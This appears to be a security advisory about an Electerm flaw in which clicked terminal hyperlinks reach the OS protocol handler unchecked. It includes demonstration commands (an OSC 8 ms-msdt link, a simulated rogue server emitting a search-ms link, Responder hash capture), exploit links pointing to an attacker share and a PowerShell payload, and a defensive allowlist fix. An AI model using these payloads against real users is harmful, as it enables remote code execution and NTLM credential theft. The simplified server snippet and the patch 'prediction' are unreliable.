Electerm, Hyperlink Protocol Injection, No CVE (Critical)


The vulnerability exists in Electerm’s terminal hyperlink handling. When a user clicks any URL displayed in the terminal, the application calls Electron’s `shell.openExternal` without validating the URI scheme. A malicious SSH server can print crafted links (e.g., ms-msdt:/c/calc, search-ms:query=exploit, file:///etc/passwd) in the terminal output. Because `shell.openExternal` invokes the operating system’s default protocol handler, an attacker who controls terminal content can force the victim’s machine to execute arbitrary commands, open local files, or leak NTLM hashes via UNC paths.

The function does not restrict dangerous URI schemes like `ms-msdt:` (which triggers the Microsoft Support Diagnostic Tool) or `search-ms:` (which can launch File Explorer with remote shares). No origin or scheme whitelist is applied. Electron’s own security recommendations explicitly warn against unsanitized `shell.openExternal` usage, but Electerm does not implement any filtering. The attack requires only a single click from the user, making it a classic “one-click RCE”. Since Electerm renders ANSI hyperlinks (OSC 8 sequences) by default, any terminal output from an untrusted remote host becomes a potential attack vector.

The issue affects all platforms where Electerm runs (Windows, Linux, macOS) because `shell.openExternal` delegates to native handlers. Windows environments are especially exposed due to legacy protocol handlers like `ms-msdt:` (CVE-2022-30190, “Follina”) and `search-ms:`, which enable code execution without further user interaction beyond the click. The absence of a patch in v3.7.9 leaves users vulnerable.

dailycve form:

Platform: Electerm / Electron
Version: up to 3.7.9
Vulnerability: Unvalidated protocol handler
Severity: Critical
Date: Unknown

Prediction: Patch after 3 months

What Undercode Says:

Analytics:

# Test whether the terminal renders an OSC 8 hyperlink (ESC ] 8 ; ; URI ESC \ text ESC ] 8 ; ; ESC \)
echo -e '\e]8;;ms-msdt:/c/calc\e\\Click me\e]8;;\e\\'
# Simulate a malicious SSH server (Python) that emits an OSC 8 link in its output
python3 -c 'import socket; s=socket.socket(); s.bind(("0.0.0.0", 2222)); s.listen(1); conn, addr=s.accept(); conn.send(b"SSH-2.0-OpenSSH\r\n"); conn.send(b"\x1b]8;;search-ms:query=exploit\x1b\\CLICK TO OWN\x1b]8;;\x1b\\\r\n"); conn.close()'
# Monitor for NTLM hash leakage (Responder)
sudo responder -I eth0 -wrf

Exploit:

An attacker sets up a rogue SSH server that prints `file://attacker/share/evil.hta` or `ms-msdt:/c/powershell%20-e YOUR_PAYLOAD` as a clickable hyperlink. The victim clicks the link, `shell.openExternal` passes the URI to the OS, and the result is arbitrary code execution or an NTLM hash leak.

Protection:

Do not click terminal links from untrusted hosts. Disable hyperlink rendering in Electerm settings (Settings → Terminal → Disable hyperlinks). Run Electerm inside a sandbox (Firejail, AppArmor) or restrict protocol handlers via Group Policy (Windows). Use `tmux` as a proxy to strip OSC 8 sequences.
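The application-side fix the description calls for, as an added example (not Electerm’s code): a URI scheme allowlist checked before `shell.openExternal`. The `shell` object is passed in as a parameter so the helper runs and can be tested outside Electron; in the real app you would pass `require('electron').shell`.

```javascript
// Added example, not Electerm's code: a URI scheme allowlist in front of
// shell.openExternal. `shell` is injected so the helper runs outside Electron
// (pass require('electron').shell in the real app); a fake object works for tests.

// Only schemes the OS may reasonably open on the user's behalf from terminal text.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// True only for absolute URLs whose scheme is allowlisted. ms-msdt:, search-ms:,
// file:, javascript:, UNC paths and unparsable strings all return false, so the
// OS protocol handler is never reached for them.
function isSafeExternalUrl(raw) {
  if (typeof raw !== 'string' || raw.length === 0 || raw.length > 2048) return false;
  let url;
  try {
    url = new URL(raw); // throws on relative or malformed input (e.g. "\\attacker\share")
  } catch {
    return false;
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) return false; // protocol is already lowercased
  if (url.username || url.password) return false;       // no embedded credentials
  if (url.protocol !== 'mailto:' && url.hostname === '') return false;
  return true;
}

// The vulnerable pattern the advisory describes: clicked text goes straight to the OS.
function openLinkUnsafe(shell, raw) {
  return shell.openExternal(raw);
}

// Hardened replacement: validate first; the caller gets a reason it can log.
function openLinkSafe(shell, raw) {
  if (!isSafeExternalUrl(raw)) {
    return { opened: false, reason: `blocked: scheme not allowlisted or malformed URL (${raw})` };
  }
  shell.openExternal(raw);
  return { opened: true, reason: null };
}
```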

Impact:

Arbitrary code execution, NTLM hash exfiltration, local file disclosure, and launching of installed applications via custom URI schemes. A remote attacker with control of terminal output can compromise the client machine with one click.


Sources:

Reported By: github.com
